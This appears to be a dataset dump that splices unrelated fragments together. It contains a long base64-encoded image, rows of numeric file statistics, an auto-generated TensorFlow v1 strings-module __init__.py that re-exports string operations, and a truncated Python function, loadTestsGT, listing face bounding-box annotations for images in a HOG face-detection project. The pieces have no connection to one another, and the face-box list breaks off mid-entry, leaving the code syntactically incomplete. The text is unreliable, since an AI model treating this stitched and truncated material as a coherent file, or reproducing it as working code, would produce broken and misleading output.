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"
| 105,735
| 105,735
| 0.965735
| 3,479
| 105,735
| 29.350963
| 0.960621
| 0.001645
| 0.002262
| 0.002742
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0.002977
| 0
| 0.159014
| 0.000019
| 105,735
| 1
| 105,735
| 105,735
| 0.80674
| 0
| 0
| 0
| 0
| 1
| 0.999905
| 0.999905
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e964fbd0676ca40a66a778d54e32c306fc5fac5a
| 1,516
|
py
|
Python
|
venv/lib/python3.6/site-packages/tensorflow/_api/v1/strings/__init__.py
|
yuxuan1995liu/darkflowyolo_detection
|
a7807e9b85833e3f877d46bb60e8fa7d0596a10b
|
[
"MIT"
] | 1
|
2019-04-11T13:23:09.000Z
|
2019-04-11T13:23:09.000Z
|
Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
caiyongji/Anaconda-py36.5-tensorflow-built-env
|
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
|
[
"PSF-2.0"
] | null | null | null |
Lib/site-packages/tensorflow/_api/v1/strings/__init__.py
|
caiyongji/Anaconda-py36.5-tensorflow-built-env
|
f4eb40b5ca3f49dfc929ff3ad2b4bb877e9663e2
|
[
"PSF-2.0"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Operations for working with string Tensors.
"""
from __future__ import print_function as _print_function
from tensorflow.python import reduce_join
from tensorflow.python import regex_full_match
from tensorflow.python import regex_replace
from tensorflow.python import string_format as format
from tensorflow.python import string_join as join
from tensorflow.python import string_length as length
from tensorflow.python import string_split_v2 as split
from tensorflow.python import string_strip as strip
from tensorflow.python import string_to_hash_bucket_fast as to_hash_bucket_fast
from tensorflow.python import string_to_hash_bucket_strong as to_hash_bucket_strong
from tensorflow.python import substr
from tensorflow.python import unicode_script
from tensorflow.python import unicode_transcode
from tensorflow.python.ops.gen_parsing_ops import string_to_number as to_number
from tensorflow.python.ops.gen_string_ops import string_to_hash_bucket as to_hash_bucket
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_decode
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_decode_with_offsets
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_encode
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_split
from tensorflow.python.ops.ragged.ragged_string_ops import unicode_split_with_offsets
del _print_function
| 50.533333
| 88
| 0.875989
| 231
| 1,516
| 5.454545
| 0.246753
| 0.266667
| 0.31746
| 0.268254
| 0.60873
| 0.313492
| 0.313492
| 0.313492
| 0.243651
| 0.243651
| 0
| 0.000722
| 0.085752
| 1,516
| 29
| 89
| 52.275862
| 0.908369
| 0.112137
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.954545
| 0
| 0.954545
| 0.090909
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e973dcd75d436c13762a57ad43f16bb050308e58
| 16,698
|
py
|
Python
|
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
Face-Detection-HOG/loadTests.py
|
buzem/vision-projects
|
b1bd5a60cedadb38c3e87b22b46bbec4d6f79852
|
[
"MIT"
] | null | null | null |
def loadTestsGT():
ValidationGroundTruthsList = [['voyager.jpg',117,37,143,69],['voyager.jpg',187,48,209,76],['voyager.jpg',298,55,318,79],['voyager.jpg',385,21,411,53],['voyager.jpg',252,190,276,218],['voyager.jpg',301,176,325,198],['voyager.jpg',138,432,168,466],['voyager.jpg',245,456,277,488],['voyager.jpg',338,431,370,463],['puneet.jpg',54,131,80,157],['puneet.jpg',126,111,146,135],['puneet.jpg',120,156,146,182],['puneet.jpg',157,145,181,171],['puneet.jpg',204,149,226,171],['puneet.jpg',245,143,267,165],['puneet.jpg',278,134,298,154],['puneet.jpg',319,122,341,144],['puneet.jpg',293,169,313,191],['puneet.jpg',353,151,373,175],['puneet.jpg',376,148,400,174],['puneet.jpg',397,123,415,143],['puneet.jpg',415,140,437,160],['puneet.jpg',484,129,510,157],['people.jpg',79,93,121,127],['people.jpg',204,101,238,137],['people.jpg',265,98,295,130],['people.jpg',333,124,353,150],['people.jpg',411,113,431,139],['people.jpg',475,116,501,142],['people.jpg',540,94,566,128],['people.jpg',622,121,656,151],['people.jpg',202,211,236,251],['people.jpg',332,246,360,278],['people.jpg',502,252,534,288],['people.jpg',609,233,637,265],['boat.jpg',330,224,358,256],['boat.jpg',488,223,520,255],['cnn1630.jpg',147,69,171,95],['cnn1160.jpg',70,58,88,78],['cnn1160.jpg',156,53,174,71],['cnn2600.jpg',134,73,188,137],['cnn1714.jpg',100,87,168,179],['cnn2221.jpg',117,57,167,111],['cnn1260.jpg',106,65,188,159],['knex37.jpg',173,71,217,109],['life2100.jpg',59,150,79,170],['life2100.jpg',105,198,129,222],['life2100.jpg',147,184,169,214],['knex0.jpg',57,73,113,137],['cnn1085.jpg',124,72,178,138],['cnn2020.jpg',109,69,197,163],['life7422.jpg',69,69,97,97],['eugene.jpg',97,181,181,269],['next.jpg',71,13,95,41],['next.jpg',139,27,159,55],['next.jpg',215,51,233,73],['next.jpg',285,46,307,72],['next.jpg',351,26,371,50],['next.jpg',88,160,112,182],['next.jpg',181,136,205,164],['next.jpg',274,143,296,171],['ds9.jpg',41,121,81,167],['ds9.jpg',99,34,135,70],['ds9.jpg',155,100,191,140],['ds9.jpg',209,42,239,86],['ds9.jpg',292,70,32
6,112],['ds9.jpg',395,155,431,199],['ds9.jpg',473,110,503,152],['ds9.jpg',562,128,596,170],['baseball.jpg',81,32,125,80],['book.jpg',90,379,114,409],['book.jpg',170,372,192,398],['tammy.jpg',108,146,150,190],['original1.jpg',29,43,49,65],['original1.jpg',118,47,138,69],['original1.jpg',89,104,109,126],['original1.jpg',160,74,178,96],['original1.jpg',199,110,217,136],['original1.jpg',318,55,334,75],['original1.jpg',323,83,343,111],['original1.jpg',377,31,397,55],['original2.jpg',54,353,108,415],['original2.jpg',196,339,254,405],['original2.jpg',352,240,410,316],['original2.jpg',561,198,621,276],['original2.jpg',467,108,521,166],['original2.jpg',279,168,333,224],['original2.jpg',130,180,182,240],['voyager2.jpg',54,142,104,206],['voyager2.jpg',166,158,214,214],['voyager2.jpg',346,52,390,106],['voyager2.jpg',524,101,578,153],['voyager2.jpg',261,218,309,270],['voyager2.jpg',427,19